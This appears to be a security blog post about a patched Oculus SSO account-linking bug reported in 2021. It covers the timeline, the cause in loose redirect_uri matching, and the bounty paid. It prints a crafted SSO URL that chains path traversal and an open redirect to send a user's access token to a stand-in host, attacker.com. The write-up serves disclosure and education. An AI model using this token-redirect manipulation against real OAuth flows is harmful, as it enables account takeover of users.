asd
HomeTakeoverAccount TakeoverFacebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover

Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover

Oculus Account Takeover: Oculus SSO “Account Linking” Bug Exposes Users to Account Takeover

Oculus Account Takeover – A critical security vulnerability in Oculus’s “Account Linking” feature, discovered by bug hunter Youssef Sammouda, has put users at risk of account takeover on third-party websites and VR games/apps. The bug, reported on February 26, 2021, was acknowledged by Facebook on March 2, 2021, and fixed on March 16, 2021.

The vulnerability allowed attackers to manipulate the callback endpoint, redirecting the Oculus access token to their own website, potentially leading to account takeover. This was possible due to a lack of exact matching of values in the redirect_uri parameter and the organization’s SSO settings, as well as inadequate filtering of characters.

To exploit this bug, an attacker could modify the redirect_uri parameter, for example, from:

https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect&organization_id=695304644729285

to:

https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect/../../../../../../open_redirect?next=https://www.attacker.com&organization_id=695304644729285

The access token would then be sent to the attacker’s website, allowing them to login to the user’s Oculus account and potentially access other linked accounts in VR games and apps.

Sammouda notes that this type of bug is common in OAuth authentication flows and emphasizes the importance of checking for small and common issues before looking for complex ones. Facebook has since fixed the issue and awarded Sammouda a $12000 bounty, including a bonus, for his discovery.

This incident highlights the importance of thorough security testing and responsible disclosure in ensuring the safety and security of users’ accounts. By working together with security researchers like Sammouda, companies can identify and address vulnerabilities before they can be exploited by malicious actors.

 

–Meta bug bounty program

 

Link to read full write up: https://ysamm.com/?p=697

Save the PDF here

Christin
Christinhttps://secry.me/explore
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

2 × 3 =

Most Popular

GOOGLE ADVERTISEMENT

- Advertisement -